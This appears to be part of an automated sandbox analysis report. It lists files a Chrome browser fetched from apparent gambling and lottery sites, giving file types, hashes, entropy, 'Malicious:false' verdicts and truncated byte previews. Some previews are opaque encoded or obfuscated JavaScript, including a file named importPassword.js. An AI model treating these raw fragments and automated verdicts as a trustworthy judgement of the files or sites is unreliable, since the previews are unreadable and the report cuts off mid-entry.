                                                                                                                                                          SSDEEP:384:Bd/F5IhIlqmVUgkOduOyX2sjzELCfBhC6DvFSi9q:B70IImVUvOduOyGsikhC6DvFE
                                                                                                                                                          MD5:CF4793E4F829969195CB58EFFDFFCC3C
                                                                                                                                                          SHA1:73EA126C25F1EC7E02A3216AFBDC68204EDC18BB
                                                                                                                                                          SHA-256:1E91C94ABA2BC799802FCB49FEE566D9095FE76D2C2EEBE7E876E06E50DD6E00
                                                                                                                                                          SHA-512:6C837B9092076E7DA94E8305573C76631CA9402B2E903D6B9EF10EB18585D874B1F29F2D2267D34DCCE18AEAE0172A3E0023354C01EF7A44827EA09A264B8D84
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D248D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D238D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 54 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3109
                                                                                                                                                          Entropy (8bit):7.706283039882216
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:ZA0+0WPeAdf+SDoEP12T9HeENggB36lCnRCylQ1:t5Gl925HogpHRJ+1
                                                                                                                                                          MD5:6E108EFDC69187A1FF89C67E47C47489
                                                                                                                                                          SHA1:052D793F9D0111E88D700C76B67C9238AF59AE08
                                                                                                                                                          SHA-256:73E1649EF12CC18AFB948D9C68089242053E2979CF314C7CEB7185E303322395
                                                                                                                                                          SHA-512:A12A3F2C1CA15C137F4A9885C63C03F83415350BCB356EFEA2996375603B5DDE8E8CC6EAF6F5E8F6165BFD23606FCC4D8F767538F3E81CC554373AA493384FC6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/footer/icon_sport.png
                                                                                                                                                          Preview:.PNG........IHDR...6...6......Ej.....tEXtSoftware.Adobe ImageReadyq.e<...)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:D1E20A4921F511EE95B3B3F5D30ADB92" xmpMM:InstanceID="xmp.iid:D1E20A4821F511EE95B3B3F5D30ADB92" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2983C652F3A111E79560918E92C2051D" stRef:documentID="xmp.did:2983C653F3A111E79560918E92C2051D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx..Z.p.W.>{w/b.)*.D.I...6.G=.QS.%3..R.at*..C....V.B.....vhG=ZD..x.....{w.../s.v....crf.9..=.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20027
                                                                                                                                                          Entropy (8bit):7.963371497875305
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ITa1uA+fOWplgEF9zASXi/D/tvBmkNr8rG5mn3kMFen:ITaC5peEj01Q8r75CzFen
                                                                                                                                                          MD5:CFF93AD3AF5B98A472DCD451E0E50CAC
                                                                                                                                                          SHA1:2DF7BB9E726A9992EFBF691D69661D84F96AB5B9
                                                                                                                                                          SHA-256:CB9A7B35081FE5D28C85E543DC38AE3E8174FCD9A228094C4E29FE96C57BD6B9
                                                                                                                                                          SHA-512:3784694E01625E7A473962E4D71BC9947A94870B5E1041E93677A59B8FFD8D28C89792139CF7631561CD2C8C368B6148E9D64910C3673B413C9189E6B5FE4C03
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9838D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9828D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):76
                                                                                                                                                          Entropy (8bit):4.05560346867421
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:xPX38/ZoS+NT/ZoS8/ZoS8/ZoS8/ZYn:xPn8/ZoSyT/ZoS8/ZoS8/ZoS8/ZYn
                                                                                                                                                          MD5:DCB18462446ABB1828105B326EA586A1
                                                                                                                                                          SHA1:0FD2FCF67CB8A0764418018F9A74176EF76DF996
                                                                                                                                                          SHA-256:07B81388CEC7E395783817D5AC4375B398005B5EAA6DF59085D7157CF876B755
                                                                                                                                                          SHA-512:7CBC5B0108ADA8BF24F6B969A9353953BCFA9DFFDDBA31C71062BB4B3C610A3FCD0964CC8F23ABAC0B02F393174D17119A658B24023E477FB5F8549C0991AB80
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISMwm3TQD9w1ie3xIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVTg==?alt=proto
                                                                                                                                                          Preview:CjYKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgAKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2110
                                                                                                                                                          Entropy (8bit):6.717290855263161
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:x/6/zNnwknA9Wp8+udiocJ313uBHFzXEqEshVeF:xSBwknmWp8jFJBHFzXfnhVeF
                                                                                                                                                          MD5:2033970D543016A4B4F6280371EC0B74
                                                                                                                                                          SHA1:6669D2E61CB773F43940146B51D20AA5C8CD02C8
                                                                                                                                                          SHA-256:00F9EB9FBD8C7BED73772C6A587EE88A338200D8C185F934B694EE39D6E287EE
                                                                                                                                                          SHA-512:BBAF878543D906AD18DC669A60E661ABA52F4FE6B47829080FBD81E8CC2961284334B353F89FEF876021F0DF8BE845B9F50A2457B042308AADCE96DF3345900D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/slot/icon_user.png
                                                                                                                                                          Preview:.PNG........IHDR..............w=.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmp:CreateDate="2023-07-19T12:07:20+08:00" xmp:ModifyDate="2023-07-24T11:26:29+08:00" xmp:MetadataDate="2023-07-24T11:26:29+08:00" xmpMM:InstanceID="xmp.iid:3bcaa9ea-8275-44ac-b756-3cdcceb0b46e" xmpMM:DocumentID="xmp.did:DA57DDF0F3A011E78438A8440354D38B" xmpMM:OriginalDocumentID="xmp.did:DA57
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 428 x 209, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):77864
                                                                                                                                                          Entropy (8bit):7.991897314130585
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:1536:+1B3oY5y7Xfde5VRF+hUZtDiiRqz/XyQWDEWt1qxX8Qkb7dGmnyfE0u:OB4tPdWRUSZYzsEl2Qkf8lfER
                                                                                                                                                          MD5:399E94361E4FF3346F2B83A32AE4C019
                                                                                                                                                          SHA1:1867B3C4AE21B30CBA904E36A6354244683346C0
                                                                                                                                                          SHA-256:01CC14175BCA5CA2ADE98EAEFD5C64BBE17E365640BBA6AEC0EC326C9DEAF4A2
                                                                                                                                                          SHA-512:D7D3D3C15B6354DC44A4BD7CCB7770E6CA7F2FC0294C70FFAE071F14C493459AADF1A4365A7A49AFA4BA546E1D49AB77AA03BC45C165C70CC4B4972DE6D6175B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/lang_pz/paiz1.png
                                                                                                                                                          Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:E6A55FCAC5B811E7A08E825F09D1C3B7" xmpMM:DocumentID="xmp.did:E6A55FCBC5B811E7A08E825F09D1C3B7"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E6A55FC8C5B811E7A08E825F09D1C3B7" stRef:documentID="xmp.did:E6A55FC9C5B811E7A08E825F09D1C3B7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>+.P...,.IDATx..].X.W.^M.1.X....1..K...{........E. ..`.."...W.Jo.Y......e].%..b.....0...3......+..>.b....,f......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (27136), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):27136
                                                                                                                                                          Entropy (8bit):5.695191668316121
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:DPnJVDMd9YAgKAQ3fgKAQ3fgKAQ3fhdV0:znJVDLxxmdV0
                                                                                                                                                          MD5:9CB313BAE3305AA77AFB3906885861B4
                                                                                                                                                          SHA1:F5682DC801F0C648236371600370ADAE9D70D4DD
                                                                                                                                                          SHA-256:6C4355A56536B5CB74199A2ECF522A9AECF36FEB6489A50B77F37533093F7771
                                                                                                                                                          SHA-512:99563A6B078875CC36FF8417462BEF8228412E1AF46922C70E08626168C7D49B5142399A8465A228FF831BA56D9DD483AA3E96B1024CC415094E10D1BEFF10F2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g3i6xDTyvG1SFn817t164NmZMmMF0oh762Gd0BApJfRrh5QI343qN7teOnvBVZNXosyoduupvopxNrfYmyFgfaVpr/li/h45VuCAtbkfNRQN3OJJNXzINTp6RAm9u/ABC7pxVm1syUyCIZA8NhgprcX2SlBwckFIkDEHOl8LDQ1xftGEi1Xh4PfoSv9kxKramLT4pe3onHJSjQ+nn5raiEw6z68LrrwO2flo3B+D7GwlbtYXP42+1IRuEJKIdW137/se9qtv8SpehS8sDI3PMhhOjiaLb3FraTmbpctNvwkCCkQesDdjqkjku9k9lV3icAZtjkX8XlYhpA6SpYdVWMzGqK0MJI2dSUThy22ZN9saPFG17dG057YKe6mozwl4A7BIKpf44V1cmVb8EH43xs7p6RFzAC8KUsJ97beLm3eHGNnW4JvQD1dDoNEsfzOwwlOxL71cptXDb3f+0wYOybwe0aPQbz1dKtOzRu/AWY900JIzCtVqmgQ7f4E9pwHSeU4Ru6RzFCIoN2c1UtHO70evXk3V+/y7hZhFHiU34QiTNdPFYSlEjpmaD8wwBm+oy/R7lFCM5vTvgVG9K8a/89xP0di85LFuhbZujinu+fBwEcFq7nrqusU46ZH4wY8TalLMaoBB3qsX0OgWcLtgwCruIZasaF3LfNc5e6FfErI4Tq4b7+eP3jm/8cJWB0UnN03/vv7NRbK6i5QgU+wgj58PY7sWq+2BugmR8smYuLZetTCQYRWHaYsghz9wQUPfUpgPQgz/iQysv+Ni4sUBxfTRblTl8zcUnruFQPDTumwMqpnqaaRORboWwmNlXi3Dkv4GA6q0ZzZ2GhutWmYCH+0PpivpGXaAhXgdy1eMg7gZLeUUN/PsYon/zGbAVVQU38wAGvPnV0l7w7gzMry+qu6xv+r/ILSt0hX1PYQhppfAhVIwI2D2Y3RnvIDFtS9
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 963 x 45, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):40722
                                                                                                                                                          Entropy (8bit):7.935240503998428
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:6dHB36liXQidlxJ0ylw/aIJutBVmwNylHHTeC0aIIyKAeU6POjDD3ctWrvJ:6j6IQ2kaXvmwNkn6H4U6PQ3ZrB
                                                                                                                                                          MD5:4527E094963BD7ED2C2AF6C6EFA850DA
                                                                                                                                                          SHA1:37FA3D05B9DAFF5C2006B001C7658AE1CA5A059E
                                                                                                                                                          SHA-256:B2813EAC4754D548F115E904529A1F4FC0D88EBE03E5048C5E75CD793605AD37
                                                                                                                                                          SHA-512:7F91CD2B4697DCB6519453F7289DD15283E9323BFA8B97BC8D2D1D4F888C7554C76ABC5F6E2193328FDC213B2C9AE5BEF0B5461BEEEF2FD3550F7740726E7823
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/footer/new/footer_gray_01.png
                                                                                                                                                          Preview:.PNG........IHDR.......-.......Y....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be9, 2021/12/08-19:11:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2022-06-08T15:04:24+08:00" xmp:ModifyDate="2022-06-08T15:05:09+08:00" xmp:MetadataDate="2022-06-08T15:05:09+08:00" xmpMM:InstanceID="xmp.iid:2d3018ee-5bd6-444f-8b27-076f830409c3" xmpMM:DocumentID="xmp.did:2B7A426AF36B11EB8EFACF51E005D5FF" xmpMM:OriginalDocumentID="xmp.did:2B7A426AF
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):467372
                                                                                                                                                          Entropy (8bit):5.999919085060443
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:GJ1c5aaaWmVC8ObMpzf7WD9Wb9z1daIAFK8qyo:g6daWOOA57WEZdaZ1Lo
                                                                                                                                                          MD5:D441CA49E6DC61E5DEC8A366F1414F2B
                                                                                                                                                          SHA1:6B40D15AA21E1DD3F9C71A9775D0980BB0E6D49C
                                                                                                                                                          SHA-256:BC0961C17A3768FC7CD6AFDBA0630A4B648B7D718B340E629029709D0FAB001C
                                                                                                                                                          SHA-512:8D00EC7C895B7E41B49240B83CCE07512BA47606F086FC33531EF91EC78146944BC3546C48F69D182C2D1411427AFE4AF9D112A2F1DE4C8FC873C1D27A4FA915
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/fiximg/ac-20200404/fileupload/ll12/202308/202308232149512.jpg
                                                                                                                                                          Preview:4Mye78yQQodBYchoXbg6Qz+nnJTv8wegMT6Z7MFgDdMxmBMg7mGXEPAbL+7zWzx9zx3Nlr1c/yflSsR2aWl2kPa+QtC3vp0En9wVdd5e0T/szO4Ud7k7X0Pws/eC0g0wAdyeXQSbmyppex2DyFwIWisp1/MRfRjxqyVidNEAGtyLyhijdhGWUvaaIc675omkdUSswcPGhiJZRfstAE5JgsZMQTP7vbqLexBpOrxHq2RUYKFUwlgCu/edSdcbPGUnvYFJWuJe2uUplI9pWsq7oXP6SdGRwpbXo1EoRJNbKaxLqbfg1YT4+khDf1n2iOOv7N0nJkd3R2KLI5SJYvtyAbQwltXye6fanRGYpCA7B5TJOIl+ZBu5eBXq3amw4t51EWJ9FWOH54WtyIk4m7Nlyj1+g8yoeTkxyUY/Tpf8TbT4qbgB3/fr2FbKfxtY44GJT/nk8z2s5FEVsn8mgjWgnH3tqeOFZET70VM+wChTa4N6HxMaeBw+Z6m/5yMtfow61cwjAxh80RNn0R+1qm2WnTd09uyVO3BrRNsysB8/BAnTKUDHEYe43cOBD0NZ5uSUaZTc/t8UbFn3xsOKugrDbDJwxRo1T4X0cxlD+GRw9vZcA6XjvnE07Ma0BkvTGyIF2fI/noSrFFiAxB1pdJE/kCx/gEG66zHAlzwTFTHD5gp/Z/oF8cQF/33wVWvppiaJhbDbq9JQUvqRhpdsyY2Z0tX1FG30S3OeFeZQI8hftxrcB8DwobN8j+ptFSDuVvoJLIK/uRKH0WpsD/fja4iXvYGTtedcTvMmE0Owoq4WH72oKN50JTc0Sd4NUFwhF/hHhFkId4Gfd6+p4K8RX/kGa2k86tBpV66a/iLjMxDzGK+UnsQzyfNtzuXD4Y/6i7f8/2NbEq6iRYAczH2+D0kv+6RRnJdS+g7kkbCUCWfyp4GJqICz4KWpdHgvkx8a/HSVKF9OHAYJ2U+h0fnvwRjaQZb1shaX+MB6JvIt2xG3
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):10701
                                                                                                                                                          Entropy (8bit):7.9683076433498226
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:+SdVshSZ4mxnmA3R6d/9kODoOPrubmB0MrLSvpx84uIapLD6C1nSulXf4sKtYTe:h/7+mxX8kgr0Mnl4uxpLD6c+lp
                                                                                                                                                          MD5:FC0682F5F2A62EC1287508A138A5DCE8
                                                                                                                                                          SHA1:4454F4AC6D257B8FF7C84C67182BF7422FF2988D
                                                                                                                                                          SHA-256:D12E4A7B6B428F854D400D33D4638417A3A8D45BF488ACBF85721855EB813857
                                                                                                                                                          SHA-512:F70441DDD92343EEC52AFDA2439582B73484C3140D55507AAB41E32923B7A396D1B6FC8C6795E97F23DCEFDFD059F66D2A6DA442D2A87CECE2E3DF4CA87D1669
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/lotto/lottery_1018.png
                                                                                                                                                          Preview:.PNG........IHDR...P...P............sRGB...,.....pHYs...............)rIDATx..}y..Wy.w........I.d.eY......f..8.S...b2.@QT.. ..OMQ.d...C.M....x(.p!L..ey...,Y.....m...........'#.,...{_..s~.[~.w.y.{:*O.u...".6.Z.....h..a.n).......r..E4.u.....<.....e.(_.=.}...].......;.0.9....b..9%.U.......'Ey...........a.6O*ub......HZ=\.v...M.u...H....7EQ{.........J=a...u...Y.u=..[.)...`.8..`..m..........Q7GQx..y.. +Y18s.3...........t.>W.........=.K.l=.f.s..7. l[...z.%....Z....?....8;zns.........p...Y....0z.>.B.U...nt.C...o....o....u}..nE.o.-.\...ic.T.......B.2m.2.A@q..j.2..2.G.<.]........uP..q.U..|.........k.M.&......:...Q.;..:......v.T+.pm.h....H.U..1pi....@mT....I..&.hQ.2..O..2.,.W.s....=u.g ..B...~S.V....j.....|...*..a..s..H^dAs..9PC4.1.#..x.<.....qd|...y.U.......vj...3.E..Z....Ps.o...;..m.Z....o..7. $.G...}...N..n..LM...<.4O..|.(.N..U.J.R*%xiY....".@D..p.Tr.."..g..;...\..R..".z>..](i...iHb......?s.BT..h...;:..6 .5......C.D.\#y........1.+....j#..m
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5876), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5876
                                                                                                                                                          Entropy (8bit):5.931265448812533
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:Vv2q6Vuctv8+yEF+y55OYTl/kcE0hIEr3Kj7/BuaI2AE+s38:VvpM8+yEFD5Os/jphDrawaI28
                                                                                                                                                          MD5:498EF62CD618BF0F826ED597080713CA
                                                                                                                                                          SHA1:AF47D9BB5B7BF7657A0839A36CCBBEEF6AB889A6
                                                                                                                                                          SHA-256:0478BA94BC06096AC6384475A91D693840733F6AEBD32970D36A780F24C4710C
                                                                                                                                                          SHA-512:1C513F598A22A863010C5A94416372C32D56B8A77085D876BD8405F971FD7756F399F63F0DB7340A4E88DAFC2C46B94A2EC15FD7C6F2873FCC54AF150CC22004
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/importPassword.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgDZ8BdAGgG8AiAFgDkAnATSoC4AzAVzRgBcBLdJiRkQASgoBfMgFEAtgAsArB259BaYaLJQJVTkhAACJLwb8+VANwB5MACsQfAHQATEO35oQABQYoIEAZeAE9MEDIqAH0okCQAWRRXTgAbECpKADcoFM4QVgBCAAZJMStshiMGAF4oTCoAEVcADmAqMTJ+WudNBg6UWvqimAh2drJeQao6JgAPG3GU6sx+TDFMKTI7Rz5MXmc5KAgAcRBeXiCkdewqfjkIFGCfKCQkYEfXDKokNABlM4EaAA5l85AZeIlXPx2CFnq93gxPpFDAxMhYQABVBgpKgkMQdVbrTbbJy8PYHI7xTi8KACdBXDaGXgASXuj14cLeH1YVF+MgAKlFmfEfDYAEqCnwAQV+vwA6uKGhkmVTTJDobDgK4eXzBfEMb89TYGsyAGJMKLS2UKsVK0qUVwoADCKRQhlUPDpmgkvAU/CQziZrIeTxeXMRjIUKGAhVwZFdQK8zO1aFSKTI3H4AEc8gBpEAhViplLpi73fkoOAgNBFtP233+wNnVUQpIanxazAFXBiaSO36cMByfi8D3qIQSComaoNpBWWfOAAk2RS/FctMezhXa9pIClJbWzl91cwXE9GnCEmhl4oU6g1W8wCMKDcHigqX2vwUUFwzhkPCSCIaigZxqxgQCvx/YRnGgeEPi3HI8gJaoX3cdh3xSfYpQgfh/lRdEJhQ190I/ZwMQEFJnByIJeDlKAGDQLwgSsa8AzBNU2xhTkEVcSd6KMJYQLAwCfDeaCUBSVxuPglckJY5xOAgdcLgxFFpIjChDFeDRk1YAM7hDDkwx4o8QHLStqzIJAcguKTjO5SjeAstArJs1hKOszCyEfdTtQYUojwUE8z3HTRxAoEBQIYfwGAAH1izBcGqapIoYOIPwAfjJKhACo5QAuuUAEVjAEzTQA7+UATlNAAQjQB8p
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5240), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5240
                                                                                                                                                          Entropy (8bit):5.908883691605881
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VtYTmga+5+vCfFXily4XY5jlsQKi4OPM5A/J1llffuh0nbfZbIlhx1c9:Vt2mx+5+vCkIB5jlsQV9lleh0nNbuK9
                                                                                                                                                          MD5:2550867ECD6E45B82BF66302F09ED65D
                                                                                                                                                          SHA1:87C249625C01798DCBBB1C048426277DFAC5CA12
                                                                                                                                                          SHA-256:1E16F61A53CDA8D3B89972D82E7CF124282F0673B1D5AC54699F63F5AFA5C813
                                                                                                                                                          SHA-512:9B95DBC6CEDDFCAB82DF4E56B51B855A987F1EE0B2DE298D249429B4A810E8729A1A8C90C559C95B26462CE005AA3674978895B65A0039D22465DCFDB254F12C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/ConversionBox.js
